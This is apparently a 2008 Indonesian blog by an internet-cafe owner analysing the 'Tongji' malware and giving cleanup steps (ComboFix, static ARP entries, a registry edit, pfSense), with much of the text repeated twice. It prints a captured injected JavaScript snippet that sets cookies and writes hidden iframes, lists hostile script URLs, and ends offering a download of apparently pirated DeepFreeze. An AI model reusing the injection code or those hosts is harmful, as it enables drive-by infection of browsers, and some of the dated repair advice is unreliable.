Wednesday, November 26, 2008
Kelemahan Si Keparat Tongji.... The weakness of Tongji dammit .... La faiblesse de Tongji dammit, Слабость Tongji Dammit, Die Schwäche der Tongji dam
9:40 AM
Dwi Darmatin
Kelemahan Si Keparat Tongji.... The weakness of Tongji dammit .... La faiblesse de Tongji dammit, Слабость Tongji Dammit, Die Schwäche der Tongji dam.....
Sudah 2 Minggu saya mempelajari Tongji..., dari imbas penyerangan warnet ... saya , ternyata dengan tutorial (langkah pertama) yang sering dilakukan orang ternyata .. tidak mujarab....!!!
Setelah saya analisa dan saya amati ..teryata tongji .. keparat tidak sehebat yang diabayangkan.., bagi saya dia adalah seorang pecundang keparat.. yang menyerang WInxp dari sisi Host.. dan dari port 443. inilah analisa saya...!!!!
awalmulanya dia menyerang .. korban dengan megirim host file mofidified... ke si korban..., setelah bersemayam beberapa host .. maka dengan mudah sitongji ... mengirim data dan file ke komputer korban .. disinilah kehebatan tongji ... ketika korban sadar bahwa Hostnya berubah maka si korban .... akan serta merta mengganti file host yang terinfeksi...!!!!, tapi apa lacur.... si tongji sudah menanmkan benihnya di dalam tubuh... korbanya...!!!
adapun benih yang pertama dia tanam adalah system.exe, update.dll mpkarnel.dll ... ketiga file tadi terkirim ke dalam komputer ... korban... dan bersemayam di startup ... dan lagi2 si tongji pandai dan cerdik .. dia membuat HBO ... regedit yang tidak bisa di hapus secara manual ..., yang intinya membangkitkan ... ketiga file tadi ,dan lebih celakanya si tongji akan menambah bebrapa file andalan sebagai berikut yang berawalan win ... diantaranya :
winddne.exe
winfcmqgg.exe
wingcmif.exe
winlceuk.exe
winanjg.exe
wintnwxkd.exe
winbsfw.exe
jika file tersebut active secara random akan melumpuhkan syaraf PC ...!!! dan file tersebut bersemayam di C:\Documents and Settings\Administrator\Local Settings\Temp..
..., udah ah jadi ngelantur ngebanggain ... sikeparat tongji ....
to the point aja...!!!
langkah yang harus dilakukan ....!! untuk memerangi tongji adalah :
1. gunakan combofix bisa didownlod disini (ketika menggunakan putuskan jaringan...!!!)
contoh hasil scanning combofix dapat download disini
2. lakukan blokir spoofing dengan jalan arp -s (ip) (MacAddress) untuk mengecek Mac Address cukup ketik Getmac dicommand prompt hasilnya seperti ini :
C:\Documents and Settings\Administrator>getmac
Physical Address Transport Name
=================== ==========================================================
00-0E-E8-8A-02-7A \Device\Tcpip_{89A466EC-F738-4DC9-8C5C-DB5CECA7FFAE}
Disabled Disconnected
C:\Documents and Settings\Administrator>getmac
3. Selalu activkan service dengan nama server...!! jangan sampai mati (karena kalau mati semua sharing network browser akan mati)
4. Selalu activkan service dengan nama RPC !! jangan sampai mati
5. Selalu activkan service DeepFreeze !! jangan sampai mati
6. Update path windows xp anda ..bisa di download disini update1 , update2 , update3, update4
7. Install NoScript di Mozila /IE.
8. block file yang seperti diatas win.....exe.
untuk lebih jelasnya download article ini ..... disini
Sudah 2 Minggu saya mempelajari Tongji..., dari imbas penyerangan warnet ... saya , ternyata dengan tutorial (langkah pertama) yang sering dilakukan orang ternyata .. tidak mujarab....!!!
Setelah saya analisa dan saya amati ..teryata tongji .. keparat tidak sehebat yang diabayangkan.., bagi saya dia adalah seorang pecundang keparat.. yang menyerang WInxp dari sisi Host.. dan dari port 443. inilah analisa saya...!!!!
awalmulanya dia menyerang .. korban dengan megirim host file mofidified... ke si korban..., setelah bersemayam beberapa host .. maka dengan mudah sitongji ... mengirim data dan file ke komputer korban .. disinilah kehebatan tongji ... ketika korban sadar bahwa Hostnya berubah maka si korban .... akan serta merta mengganti file host yang terinfeksi...!!!!, tapi apa lacur.... si tongji sudah menanmkan benihnya di dalam tubuh... korbanya...!!!
adapun benih yang pertama dia tanam adalah system.exe, update.dll mpkarnel.dll ... ketiga file tadi terkirim ke dalam komputer ... korban... dan bersemayam di startup ... dan lagi2 si tongji pandai dan cerdik .. dia membuat HBO ... regedit yang tidak bisa di hapus secara manual ..., yang intinya membangkitkan ... ketiga file tadi ,dan lebih celakanya si tongji akan menambah bebrapa file andalan sebagai berikut yang berawalan win ... diantaranya :
winddne.exe
winfcmqgg.exe
wingcmif.exe
winlceuk.exe
winanjg.exe
wintnwxkd.exe
winbsfw.exe
jika file tersebut active secara random akan melumpuhkan syaraf PC ...!!! dan file tersebut bersemayam di C:\Documents and Settings\Administrator\Local Settings\Temp..
..., udah ah jadi ngelantur ngebanggain ... sikeparat tongji ....
to the point aja...!!!
langkah yang harus dilakukan ....!! untuk memerangi tongji adalah :
1. gunakan combofix bisa didownlod disini (ketika menggunakan putuskan jaringan...!!!)
contoh hasil scanning combofix dapat download disini
2. lakukan blokir spoofing dengan jalan arp -s (ip) (MacAddress) untuk mengecek Mac Address cukup ketik Getmac dicommand prompt hasilnya seperti ini :
C:\Documents and Settings\Administrator>getmac
Physical Address Transport Name
=================== ==========================================================
00-0E-E8-8A-02-7A \Device\Tcpip_{89A466EC-F738-4DC9-8C5C-DB5CECA7FFAE}
Disabled Disconnected
C:\Documents and Settings\Administrator>getmac
3. Selalu activkan service dengan nama server...!! jangan sampai mati (karena kalau mati semua sharing network browser akan mati)
4. Selalu activkan service dengan nama RPC !! jangan sampai mati
5. Selalu activkan service DeepFreeze !! jangan sampai mati
6. Update path windows xp anda ..bisa di download disini update1 , update2 , update3, update4
7. Install NoScript di Mozila /IE.
8. block file yang seperti diatas win.....exe.
untuk lebih jelasnya download article ini ..... disini
Sunday, November 16, 2008
Warnet Anda Lumpuh .. Sama akupun juga iya.. Tongji ... Pecundang Bikin Lumpuh Warnet Gw.. (Update Terbaru Artikel Untuk Memusnahkan Tongji)
Entah siapa itu Tongji dan apa maksudnya nyerang wanet Gwa..., Uh sebel banget gwa sama si tongji..., warnet gw berdiri tahun 2005 baru sekaratang bisa lumpuh sama di tongji keparat... , Awalnya gw panik.. share hilang, internet lemot...wuih bikin user pada kabur...!!!!
Akhirnya gw coba googling apaitu tongji dan siapa dia..., eh gwa dapat jawaban dari si embah...wih matur nuwun mbah.... ternyata si tongji menginfeksi setiap browsing ... yang kita buka..., ini contoh javascript si tongji.... mau lihat .. penasaran yach ini dari page source gw ketika gwa browsing yahoo .. kira seperti ini
didalam yahoo ada ini ""
nah gw penasaran ada apa dibalik script ini......, gwa coba cari file js ini http://do.qwertyy.cn/do.js... dan gw lihat dalamnya seperti ini..!!!
document.writeln("");
document.writeln("function oK_Begin(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<\/riframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("oK_Begin();");
document.writeln("<\/scriprt>");
document.writeln("window.onerror=function(){return true;}<\/scrirpt>")
pantesan aja warnet gw lumpuh total .. la wong isi scriptnya seperti itu. ya inet gw lelet lah .. :p
dengan berbekal .. info dari sana gw akhirnya googling sama si mbah dan menemukan jawaban sbb :
http://mx.content-type.cn:443/day.js
http://js.tongji.cn.yahoo.com/621252/ystat.js
http://ad.5iyy.info/day.js
http://js.tongji.yahsoo.com.cn
wih serem juga yach .....
Cara yang ampuh untuk menangani itu dengan cara ...
1. format pc
2. install avira / Rising
3. download script addon no script
4. Babat pake Combofix .... bisa didownload disini...
5. Update pake service pack 3 :p
setelah gw amati keempat cara itu bukan cara ampuh buat pemilik warnet karena alasan sbb :
1. Format PC so pasti nambah waktu .. maintenance / ghost pc
2. Antivirus pasti banyak popup & lain sebagainya ...
Ini Jurus ampuh dan jitu saya....
sebelumnya simpan file regedit.exe yang segar bugar ke Flashdisk.
1. Download COmbofix .... disini ..
Sebelumnya Cabut semua Cable /Bebaskan Computer anda Dari Network.
Lakukan Proses Pembersihan Dengan Combofix.
Setelah prosesi combofix Selesai...
2. Repair Generic Host32 yang error dengan jalan.
a. Buka File Regedit dari Fashdisk Anda (Backup Regedit Yangmasih segar bugar:p)
b. Sekarang, Di menu regedit Klik Edit>Find or Ctrl+F and write
"TransportBindName" didalam box tanpa spasi dan quotation mark. Ini Akan
membutuhkan waktu yang sedikit lama dalam pencarian. Value ini akan ketemu dalam
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\N etBT\Parameters
c. Double-click pada value dan set value ke 'N' Biasanya mungkin di set 'Y'.
d. Restart Komputer anda .. (Hela Nafas..Minum Sedikit Air Kopi)
3. ganti file sebagai berikut dari computer yang masih segar:
rundll32.exe
explorer.exe
Host File
regedit.exe
karena ke empat file tersebut adalah korban utama tongji keparat.
4. kemudian ...
Lihat terlebih dahulu di server /yang bagi memiliki warnet status Mac Address Anda ... apakah static apa dynamic ..
dengan cara arp-a
jika dynamic segera lakukan perubahan jalan sbb:
ipaddress Mac Address
arp -s 192.168.0.1 25-jl-52-63-ki-0f
untuk mengetahui mac address anda ketik ipconfig /all.
5. Gunakan Antivirus SMAVAD 3.7 (latest) Centang Registry Area Ke Deep. download disini
6. Update security patch and
Tutup Sementara Akses port 443
berbekal itu semua akhirnya saya menyatakan pernag dengan tongji .... atau .. apa itu
Agar Tongji nggak balik lagi kewarnet kita lakukan langkah sbb:
1. Siapkan Sebatang Rokok dan Minumsecangkir kopi tentunya...!!
2. Install PFsense.... bagi yang udah punya ... ya nggak usah install lagi :p
3. Ikuti langkah saya download langkah jitu saya .. disini gratis koq!!!
Akhirnya gw coba googling apaitu tongji dan siapa dia..., eh gwa dapat jawaban dari si embah...wih matur nuwun mbah.... ternyata si tongji menginfeksi setiap browsing ... yang kita buka..., ini contoh javascript si tongji.... mau lihat .. penasaran yach ini dari page source gw ketika gwa browsing yahoo .. kira seperti ini
didalam yahoo ada ini "
nah gw penasaran ada apa dibalik script ini......, gwa coba cari file js ini http://do.qwertyy.cn/do.js... dan gw lihat dalamnya seperti ini..!!!
document.writeln("
document.writeln("function oK_Begin(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'
document.writeln("}");
document.writeln("}");
document.writeln("oK_Begin();");
document.writeln("<\/scriprt>");
document.writeln("
pantesan aja warnet gw lumpuh total .. la wong isi scriptnya seperti itu. ya inet gw lelet lah .. :p
dengan berbekal .. info dari sana gw akhirnya googling sama si mbah dan menemukan jawaban sbb :
http://mx.content-type.cn:443/day.js
http://js.tongji.cn.yahoo.com/621252/ystat.js
http://ad.5iyy.info/day.js
http://js.tongji.yahsoo.com.cn
wih serem juga yach .....
Cara yang ampuh untuk menangani itu dengan cara ...
1. format pc
2. install avira / Rising
3. download script addon no script
4. Babat pake Combofix .... bisa didownload disini...
5. Update pake service pack 3 :p
setelah gw amati keempat cara itu bukan cara ampuh buat pemilik warnet karena alasan sbb :
1. Format PC so pasti nambah waktu .. maintenance / ghost pc
2. Antivirus pasti banyak popup & lain sebagainya ...
Ini Jurus ampuh dan jitu saya....
sebelumnya simpan file regedit.exe yang segar bugar ke Flashdisk.
1. Download COmbofix .... disini ..
Sebelumnya Cabut semua Cable /Bebaskan Computer anda Dari Network.
Lakukan Proses Pembersihan Dengan Combofix.
Setelah prosesi combofix Selesai...
2. Repair Generic Host32 yang error dengan jalan.
a. Buka File Regedit dari Fashdisk Anda (Backup Regedit Yangmasih segar bugar:p)
b. Sekarang, Di menu regedit Klik Edit>Find or Ctrl+F and write
"TransportBindName" didalam box tanpa spasi dan quotation mark. Ini Akan
membutuhkan waktu yang sedikit lama dalam pencarian. Value ini akan ketemu dalam
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\N etBT\Parameters
c. Double-click pada value dan set value ke 'N' Biasanya mungkin di set 'Y'.
d. Restart Komputer anda .. (Hela Nafas..Minum Sedikit Air Kopi)
3. ganti file sebagai berikut dari computer yang masih segar:
rundll32.exe
explorer.exe
Host File
regedit.exe
karena ke empat file tersebut adalah korban utama tongji keparat.
4. kemudian ...
Lihat terlebih dahulu di server /yang bagi memiliki warnet status Mac Address Anda ... apakah static apa dynamic ..
dengan cara arp-a
jika dynamic segera lakukan perubahan jalan sbb:
ipaddress Mac Address
arp -s 192.168.0.1 25-jl-52-63-ki-0f
untuk mengetahui mac address anda ketik ipconfig /all.
5. Gunakan Antivirus SMAVAD 3.7 (latest) Centang Registry Area Ke Deep. download disini
6. Update security patch and
Tutup Sementara Akses port 443
berbekal itu semua akhirnya saya menyatakan pernag dengan tongji .... atau .. apa itu
Agar Tongji nggak balik lagi kewarnet kita lakukan langkah sbb:
1. Siapkan Sebatang Rokok dan Minumsecangkir kopi tentunya...!!
2. Install PFsense.... bagi yang udah punya ... ya nggak usah install lagi :p
3. Ikuti langkah saya download langkah jitu saya .. disini gratis koq!!!
Thursday, November 13, 2008
DeepFreeze Retail ..... Enterprise 6
Untuk pemilik warnet tentunya anda membutuhkan file ini karena file ini sangat sulit untuk di hack .. saya udah membuktikan ... jika anda membutuhkan file ini silahkan untuk di didownload disini .. Deepfreeze Enterprise 6 Retail... original..
Kambeeng.
